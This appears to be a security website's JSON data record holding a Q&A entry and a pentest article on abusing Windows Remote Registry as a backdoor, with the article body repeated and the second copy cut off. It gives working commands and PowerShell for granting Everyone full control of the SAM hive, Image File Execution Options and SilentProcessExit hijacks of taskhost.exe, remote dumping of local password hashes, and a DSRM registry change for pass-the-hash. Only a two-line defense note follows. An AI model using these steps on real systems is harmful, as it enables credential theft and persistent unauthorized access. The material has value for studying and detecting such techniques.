[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fG0Kmle89X1hpHo0JmnRfirWRJ0Li-R_2DfDABdD2Z8Q":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":53,"_status":51},626,"What steps are required to extract local user password hashes from a remote system via the registry?","First, enable the Remote Registry service and grant 'Everyone' full control over both `HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg` and the `HKLM\\SAM\\SAM` registry hive (including its subkeys). Then use a script like harmj0y's `RemoteHashRetrieval.ps1` to read the SAM and SYSTEM keys, decrypt the syskey, and recover all local user hashes. This technique is covered in [Penetration Techniques - Remote Registry in Windows](\u002Fnews\u002Fpenetration-techniques-remote-registry-in-windows).","\u003Cp>First, enable the Remote Registry service and grant &#39;Everyone&#39; full control over both `HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg` and the `HKLM\\SAM\\SAM` registry hive (including its subkeys). Then use a script like harmj0y&#39;s `RemoteHashRetrieval.ps1` to read the SAM and SYSTEM keys, decrypt the syskey, and recover all local user hashes. This technique is covered in [Penetration Techniques - Remote Registry in Windows](\u002Fnews\u002Fpenetration-techniques-remote-registry-in-windows).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-remote-registry-in-windows\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-steps-are-required-to-extract-local-user-password-hashes-from-a-remote-syst-1777482528586","SAM hash retrieval, RemoteHashRetrieval, syskey, local user hashes, registry ACL",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},154,"Penetration Techniques - Remote Registry in Windows","penetration-techniques-remote-registry-in-windows","Learn how to exploit Remote Registry in Windows for penetration testing, including enabling services, ACL modifications, and backdoor techniques in workgroup and domain environments.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Remote Registry in Windows allows remote users to modify the registry settings of the current computer\u003C\u002Fp>\u003Cp>In penetration testing, after obtaining administrator privileges, the Remote Registry service can be exploited as a backdoor\u003C\u002Fp>\u003Cp>Inspired by harmj0y's blog, I intend to expand on the backdoor exploitation methods of Remote Registry and incorporate some of my experiences from researching GPO, compiling them into this article.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Factivedirectory\u002Fremote-hash-extraction-on-demand-via-host-security-descriptor-modification\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Methods to enable Remote Registry\u003C\u002Fli>\u003Cli>Exploitation methods in workgroup and domain environments\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x01 Normal Usage of Remote Registry\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test Environment:\u003C\u002Fp>\u003Cul>\u003Cli>Win7x64\u003C\u002Fli>\u003Cli>192.168.112.128\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>1. Start Remote Registry Service\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net start remoteregistry\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Add ACL (Access Control List)\u003C\u002Fh3>\u003Cp>Registry Location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg\u003C\u002Fp>\u003Ch4>(1) Add permissions via GUI, specify user\u003C\u002Fh4>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017267010_0_590fd97c7a.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Implement via PowerShell\u003C\u002Fh4>\u003Cp>Add full access permission for user test1\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Remote Connection\u003C\u002Fh3>\u003Cp>Using another host, connect to 192.168.112.128\u003C\u002Fp>\u003Ch4>(1) Via regedit.exe\u003C\u002Fh4>\u003Cp>File -&gt; Connect Network Registry...\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017291978_1_5af06127d7.jpeg\">\u003C\u002Fp>\u003Cp>Enter the IP address, then input the password for user test1, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017321160_2_11df840b92.jpeg\">\u003C\u002Fp>\u003Cp>After successful connection, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017363291_3_e73b8bef2f.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Implementation via PowerShell\u003C\u002Fh4>\u003Cp>First establish an IPC connection:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net use \\\\192.168.112.128 \u002Fu:test1 Password123!\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Query the registry key of 192.168.112.128: HKLM:\\System\\CurrentControlSet\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$computer1='192.168.112.128'\u003Cbr>$Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine,$computer1)\u003Cbr>$RegSubKey = $Reg.OpenSubKey(\"System\\CurrentControlSet\")\u003Cbr>$RegSubKey.GetSubKeyNames()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x02 Exploitation Method 1: Remote Program Execution\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If the remote computer's registry settings can be modified, one can choose to use image hijacking to hijack process startup or termination\u003C\u002Fp>\u003Ch3>1、Workgroup environment\u003C\u002Fh3>\u003Cp>Taking the hijacking of notepad.exe as an example, the actual process launched is calc.exe\u003C\u002Fp>\u003Cp>Hijacked process startup:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" \u002Fv debugger \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Hijacked process termination:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" \u002Fv GlobalFlag \u002Ft REG_DWORD \u002Fd 512\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" \u002Fv ReportingMode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" \u002Fv MonitorProcess \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method was learned from https:\u002F\u002Foddvar.moe\u002F2018\u002F04\u002F10\u002Fpersistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe\u002F\u003C\u002Fp>\u003Ch3>2. Domain Environment\u003C\u002Fh3>\u003Cp>Compared to a workgroup environment, the domain environment has a reliably exploitable process: taskhost.exe\u003C\u002Fp>\u003Cp>By default, group policies in a domain environment are updated every 90 minutes on computers, with a random offset of 0-30 minutes, and every 5 minutes on domain controllers. The process taskhost.exe is launched during group policy updates.\u003C\u002Fp>\u003Cp>Group policies can also be forcibly refreshed:\u003C\u002Fp>\u003Ch4>(1) With existing domain administrator privileges, refresh the group policy for a specified computer\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-GPUpdate -Computer \"TEST\\COMPUTER01\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Refresh the group policy of the current computer, which can be used to verify this method in a test environment\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gpupdate \u002Fforce\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For detailed exploitation testing, refer to the previous article 'Domain Penetration - Remote Execution via Scheduled Tasks in GPO'\u003C\u002Fp>\u003Cp>Hijacking the startup of the taskhost.exe process:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskhost.exe\" \u002Fv debugger \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Hijacking the termination of the taskhost.exe process:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskhost.exe\" \u002Fv GlobalFlag \u002Ft REG_DWORD \u002Fd 512\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\taskhost.exe\" \u002Fv ReportingMode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\taskhost.exe\" \u002Fv MonitorProcess \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When hijacking the termination of the taskhost.exe process, if calc.exe is selected, a prompt dialog will appear, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017392214_4_fa9c51a524.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Exploitation Method 2: Obtain user hashes from the SAM file\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>By accessing the SAM file in the registry, the local user hashes of the current system can be recovered. For detailed methods, refer to the previous article 'Penetration Techniques - Obtaining Local User Hashes via the SAM Database'.\u003C\u002Fp>\u003Cp>The brief process is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Read the contents of the keys JD, Skew1, GBG, and Data under the registry entry HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa, and concatenate them to form the syskey.\u003C\u002Fli>\u003Cli>Read the contents of the F and V items for each user under the registry entry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users, and use the syskey to perform a series of decryptions.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Therefore, if remote computer registry files can be accessed, the hashes of all local users on the remote computer can be recovered.\u003C\u002Fp>\u003Cp>In exploitation, note that the default access permission for HKLM\\SAM\\SAM is 'NT AUTHORITY\\SYSTEM' (Administrator does not have access). To read remotely, ACLs must be added to this registry entry and its subkeys.\u003C\u002Fp>\u003Cp>The exploitation process is as follows:\u003C\u002Fp>\u003Ch3>1. Start the Remote Registry service\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net start remoteregistry\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Add ACL (Access Control List)\u003C\u002Fh3>\u003Cp>The registry locations are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg\u003C\u002Fli>\u003Cli>HKEY_LOCAL_MACHINE\\SAM\\SAM and its subkeys\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Add full access permissions for the user Everyone to the above registry entries. The PowerShell code is as follows:\u003C\u002Fp>\u003Cp>(Execute with System privileges on 192.168.112.128)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-RegistryACL{\u003Cbr>[CmdletBinding()]\u003Cbr>Param (\u003Cbr>[Parameter(Mandatory = $True)]\u003Cbr>[String]\u003Cbr>[ValidateNotNullOrEmpty()]\u003Cbr>$Path\u003Cbr>)\u003Cbr>$acl = Get-Acl -Path $Path\u003Cbr>$person = [System.Security.Principal.NTAccount]\"Everyone\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-RegistryACL -Path 'HKLM:\\SAM\\SAM'\u003Cbr>Add-RegistryACL -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Decrypt and restore local user hashes on remote computers using PowerShell\u003C\u002Fh3>\u003Cp>Use the following script:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FDAMP\u002Fblob\u002Fmaster\u002FRemoteHashRetrieval.ps1\u003C\u002Fp>\u003Cp>Commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\RemoteHashRetrieval.ps1\u003Cbr>Get-RemoteLocalAccountHash -ComputerName '192.168.112.128'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017417389_5_8d7c7cee11.jpeg\">\u003C\u002Fp>\u003Cp>Successfully obtained local user hashes on 192.168.112.128\u003C\u002Fp>\u003Ch3>Supplement 1:\u003C\u002Fh3>\u003Cp>Use PowerShell to decrypt and restore the hashes of all local users. Code reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FEmpireProject\u002FEmpire\u002Fblob\u002Fmaster\u002Fdata\u002Fmodule_source\u002Fcredentials\u002FInvoke-PowerDump.ps1\u003C\u002Fp>\u003Ch3>Supplement 2:\u003C\u002Fh3>\u003Cp>For domain controllers, remotely export the local user hashes of the domain controller. If you want to use pass the hash within the domain, you also need to modify the domain controller's registry to allow remote access for the DSRM account:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa \u002Fv DSRMAdminLogonBehavior \u002Ft REG_DWORD \u002Fd 2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Suggestions for Defense and Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Defense:\u003C\u002Fp>\u003Col>\u003Cli>If the Remote Registry service is not needed, it is recommended to disable it.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Detection:\u003C\u002Fp>\u003Col>\u003Cli>If remote computer registry files are accessible, there are many methods that can be exploited. For detection, monitoring registry operations on critical servers is advisable.\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces two backdoor exploitation methods for Remote Registry in Windows: remote program execution and obtaining user hashes from SAM files.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Remote Registry in Windows allows remote users to modify the registry settings of the current computer\u003C\u002Fp>\u003Cp>In penetration testing, after obtaining administrator privileges, the Remote Registry service can be exploited as a backdoor\u003C\u002Fp>\u003Cp>Inspired by harmj0y's blog, I intend to expand on the backdoor exploitation methods of Remote Registry and incorporate some of my experiences from researching GPO, compiling them into this article.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Factivedirectory\u002Fremote-hash-extraction-on-demand-via-host-security-descriptor-modification\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Methods to enable Remote Registry\u003C\u002Fli>\u003Cli>Exploitation methods in workgroup and domain environments\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x01 Normal Usage of Remote Registry\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test Environment:\u003C\u002Fp>\u003Cul>\u003Cli>Win7x64\u003C\u002Fli>\u003Cli>192.168.112.128\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>1. Start Remote Registry Service\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net start remoteregistry\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Add ACL (Access Control List)\u003C\u002Fh3>\u003Cp>Registry Location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg\u003C\u002Fp>\u003Ch4>(1) Add permissions via GUI, specify user\u003C\u002Fh4>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017267010_0_590fd97c7a-1.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Implement via PowerShell\u003C\u002Fh4>\u003Cp>Add full access permission for user test1\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Remote Connection\u003C\u002Fh3>\u003Cp>Using another host, connect to 192.168.112.128\u003C\u002Fp>\u003Ch4>(1) Via regedit.exe\u003C\u002Fh4>\u003Cp>File -&gt; Connect Network Registry...\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017291978_1_5af06127d7-1.jpeg\">\u003C\u002Fp>\u003Cp>Enter the IP address, then input the password for user test1, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017321160_2_11df840b92-1.jpeg\">\u003C\u002Fp>\u003Cp>After successful connection, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017363291_3_e73b8bef2f-1.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Implementation via PowerShell\u003C\u002Fh4>\u003Cp>First establish an IPC connection:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net use \\\\192.168.112.128 \u002Fu:test1 Password123!\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Query the registry key of 192.168.112.128: HKLM:\\System\\CurrentControlSet\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$computer1='192.168.112.128'\u003Cbr>$Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine,$computer1)\u003Cbr>$RegSubKey = $Reg.OpenSubKey(\"System\\CurrentControlSet\")\u003Cbr>$RegSubKey.GetSubKeyNames()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x02 Exploitation Method 1: Remote Program Execution\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If the remote computer's registry settings can be modified, one can choose to use image hijacking to hijack process startup or termination\u003C\u002Fp>\u003Ch3>1、Workgroup environment\u003C\u002Fh3>\u003Cp>Taking the hijacking of notepad.exe as an example, the actual process launched is calc.exe\u003C\u002Fp>\u003Cp>Hijacked process startup:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" \u002Fv debugger \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Hijacked process termination:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" \u002Fv GlobalFlag \u002Ft REG_DWORD \u002Fd 512\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" \u002Fv ReportingMode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" \u002Fv MonitorProcess \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method was learned from https:\u002F\u002Foddvar.moe\u002F2018\u002F04\u002F10\u002Fpersistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe\u002F\u003C\u002Fp>\u003Ch3>2. Domain Environment\u003C\u002Fh3>\u003Cp>Compared to a workgroup environment, the domain environment has a reliably exploitable process: taskhost.exe\u003C\u002Fp>\u003Cp>By default, group policies in a domain environment are updated every 90 minutes on computers, with a random offset of 0-30 minutes, and every 5 minutes on domain controllers. The process taskhost.exe is launched during group policy updates.\u003C\u002Fp>\u003Cp>Group policies can also be forcibly refreshed:\u003C\u002Fp>\u003Ch4>(1) With existing domain administrator privileges, refresh the group policy for a specified computer\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-GPUpdate -Computer \"TEST\\COMPUTER01\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Refresh the group policy of the current computer, which can be used to verify this method in a test environment\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gpupdate \u002Fforce\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For detailed exploitation testing, refer to the previous article 'Domain Penetration - Remote Execution via Scheduled Tasks in GPO'\u003C\u002Fp>\u003Cp>Hijacking the startup of the taskhost.exe process:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskhost.exe\" \u002Fv debugger \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Hijacking the termination of the taskhost.exe process:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskhost.exe\" \u002Fv GlobalFlag \u002Ft REG_DWORD \u002Fd 512\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\taskhost.exe\" \u002Fv ReportingMode \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\taskhost.exe\" \u002Fv MonitorProcess \u002Ft REG_SZ \u002Fd \"c:\\windows\\system32\\calc.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When hijacking the termination of the taskhost.exe process, if calc.exe is selected, a prompt dialog will appear, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017392214_4_fa9c51a524-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Exploitation Method 2: Obtain user hashes from the SAM file\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>By accessing the SAM file in the registry, the local user hashes of the current system can be recovered. For detailed methods, 